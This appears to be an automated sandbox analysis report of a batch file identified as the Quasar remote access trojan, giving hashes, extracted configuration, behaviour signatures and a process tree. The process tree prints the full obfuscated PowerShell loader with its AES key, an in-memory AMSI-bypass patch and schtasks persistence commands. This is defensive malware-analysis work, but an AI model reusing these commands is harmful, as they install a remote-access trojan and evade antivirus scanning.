Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/08/2024, 01:03

General

  • Target

    081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat

  • Size

    3.4MB

  • MD5

    e0b49da0d96e8c5214e9276be383177c

  • SHA1

    acc2c37d489134c2186e95efaf7d3ea768a226f5

  • SHA256

    081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39

  • SHA512

    b34944610642622ed45b1b09b4281e6d4b2f160c3b988aec2c254e2860cc1e5e40d6430057ea61fa323c8d99a32caeab50404c1d10baeb9a3b4bd12e6c068cee

  • SSDEEP

    49152:iPZ9h8UbMrOvMl2axWm2aPRlAYydkm6uOwIM0A8Dqpb:C

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    853F98C0E8F31E6FF0C780CC65F601689B6EF3FD

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1e0f901d-78dd-4e1e-a4ff-1286f2f2e5b9}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1968
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:684
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:388
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:612
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1028
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1040
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1052
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3008
                      • C:\Windows\system32\wscript.exe
                        wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
                        2⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:2196
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1140
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            4⤵
                              PID:3328
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo function krvoX($qfUzb){ $mgPVz=[System.Security.Cryptography.Aes]::Create(); $mgPVz.Mode=[System.Security.Cryptography.CipherMode]::CBC; $mgPVz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $mgPVz.Key=[System.Convert]::FromBase64String('xRkMWAT1uldEXK+LHs8FgxSd3tjb0CDR/qmLOT+Eew4='); $mgPVz.IV=[System.Convert]::FromBase64String('RdAogkuv6cVOJVqYg0tlnA=='); $KTEGP=$mgPVz.CreateDecryptor(); $PBmwa=$KTEGP.TransformFinalBlock($qfUzb, 0, $qfUzb.Length); $KTEGP.Dispose(); $mgPVz.Dispose(); $PBmwa;}function XUcba($qfUzb){ IEX '$ZRxrm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$qfUzb);'.Replace('*', ''); IEX '$kyGQg=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jJBpR=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($ZRxrm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jJBpR.CopyTo($kyGQg); $jJBpR.Dispose(); $ZRxrm.Dispose(); $kyGQg.Dispose(); $kyGQg.ToArray();}function dJKqw($qfUzb,$zcLjt){ IEX '$apikB=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$qfUzb);'.Replace('*', ''); IEX '$ybXvp=$apikB.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$ybXvp.*I*n*v*o*k*e*($null, $zcLjt);'.Replace('*', '');}$kzvdP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $kzvdP;$GYDJk=[System.IO.File]::ReadAllText($kzvdP).Split([Environment]::NewLine);foreach ($FUbJH in $GYDJk) { if ($FUbJH.StartsWith(':: ')) { $GufiU=$FUbJH.Substring(3); break; }}$zAGQw=[string[]]$GufiU.Split('\');IEX '$iNocK=XUcba (krvoX ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($zAGQw[0])));'.Replace('*', '');IEX '$VsMSG=XUcba (krvoX ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($zAGQw[1])));'.Replace('*', '');dJKqw $iNocK $null;dJKqw $VsMSG (,[string[]] ('')); "
                              4⤵
                                PID:548
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -WindowStyle Hidden
                                4⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:3444
                                • C:\Windows\System32\schtasks.exe
                                  "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
                                  5⤵
                                    PID:8
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                    5⤵
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:680
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2484
                                  • C:\Windows\system32\schtasks.exe
                                    "schtasks" /create /ru builtin\Users /sc onlogon /tn $nya-Loli_ /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
                                    5⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3952
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zQwqRLlluCRu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wxJErOELuetXJL,[Parameter(Position=1)][Type]$ILMaiplZKO)$jycamFgYzNN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$jycamFgYzNN.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+'i'+'g'+','+''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wxJErOELuetXJL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,Ma'+[Char](110)+''+[Char](97)+'ge'+'d'+'');$jycamFgYzNN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'H'+[Char](105)+'deBy'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$ILMaiplZKO,$wxJErOELuetXJL).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $jycamFgYzNN.CreateType();}$flQQFBFVObWFk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$fKsHqxwucuFHbs=$flQQFBFVObWFk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+'ddr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+'l'+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjRaDJVhPPzLdAsdEUX=zQwqRLlluCRu @([String])([IntPtr]);$mEtyAOVwyJNLOxNZDrGXkg=zQwqRLlluCRu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gkvXiMBlVzL=$flQQFBFVObWFk.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+'2.'+'d'+''+'l'+''+[Char](108)+'')));$bmqGEXVAudjNBB=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$gkvXiMBlVzL,[Object]('Load'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+'A'+'')));$jeWulZpvxUTqGjcmC=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$gkvXiMBlVzL,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'tec'+[Char](116)+'')));$Qafnfrl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bmqGEXVAudjNBB,$JjRaDJVhPPzLdAsdEUX).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+'d'+''+'l'+''+'l'+'');$EBWMbrqKdFELcPUUB=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$Qafnfrl,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$qkuBlLtQJF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jeWulZpvxUTqGjcmC,$mEtyAOVwyJNLOxNZDrGXkg).Invoke($EBWMbrqKdFELcPUUB,[uint32]8,4,[ref]$qkuBlLtQJF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EBWMbrqKdFELcPUUB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jeWulZpvxUTqGjcmC,$mEtyAOVwyJNLOxNZDrGXkg).Invoke($EBWMbrqKdFELcPUUB,[uint32]8,0x20,[ref]$qkuBlLtQJF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](110)+'ya-st'+[Char](97)+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:752
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Indicator Removal: Clear Windows Event Logs
                            PID:1176
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1212
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1308
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1352
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1364
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1372
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1440
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2880
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1496
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1580
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1628
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1668
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1744
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1760
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1888
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2012
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1144
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:1680
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2124
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2212
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2256
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2264
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2368
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2472
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2548
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2556
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2588
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2628
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2896
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2968
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2512
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3312
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3456
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4348
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo function krvoX($qfUzb){ $mgPVz=[System.Security.Cryptography.Aes]::Create(); $mgPVz.Mode=[System.Security.Cryptography.CipherMode]::CBC; $mgPVz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $mgPVz.Key=[System.Convert]::FromBase64String('xRkMWAT1uldEXK+LHs8FgxSd3tjb0CDR/qmLOT+Eew4='); $mgPVz.IV=[System.Convert]::FromBase64String('RdAogkuv6cVOJVqYg0tlnA=='); $KTEGP=$mgPVz.CreateDecryptor(); $PBmwa=$KTEGP.TransformFinalBlock($qfUzb, 0, $qfUzb.Length); $KTEGP.Dispose(); $mgPVz.Dispose(); $PBmwa;}function XUcba($qfUzb){ IEX '$ZRxrm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$qfUzb);'.Replace('*', ''); IEX '$kyGQg=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jJBpR=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($ZRxrm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jJBpR.CopyTo($kyGQg); $jJBpR.Dispose(); $ZRxrm.Dispose(); $kyGQg.Dispose(); $kyGQg.ToArray();}function dJKqw($qfUzb,$zcLjt){ IEX '$apikB=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$qfUzb);'.Replace('*', ''); IEX '$ybXvp=$apikB.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$ybXvp.*I*n*v*o*k*e*($null, $zcLjt);'.Replace('*', '');}$kzvdP = 'C:\Users\Admin\AppData\Local\Temp\081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat';$host.UI.RawUI.WindowTitle = $kzvdP;$GYDJk=[System.IO.File]::ReadAllText($kzvdP).Split([Environment]::NewLine);foreach ($FUbJH in $GYDJk) { if ($FUbJH.StartsWith(':: ')) { $GufiU=$FUbJH.Substring(3); break; }}$zAGQw=[string[]]$GufiU.Split('\');IEX '$iNocK=XUcba (krvoX ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($zAGQw[0])));'.Replace('*', '');IEX '$VsMSG=XUcba (krvoX ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($zAGQw[1])));'.Replace('*', '');dJKqw $iNocK $null;dJKqw $VsMSG (,[string[]] ('')); "
                                                                                          3⤵
                                                                                            PID:3052
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -WindowStyle Hidden
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Deletes itself
                                                                                            • Drops file in Windows directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3040
                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                              "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
                                                                                              4⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3956
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2848
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3564
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3744
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3900
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4172
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:5004
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:3088
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:4684
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4156
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4460
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4196
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:4384
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:4996
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:4200
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4968
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:1536
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
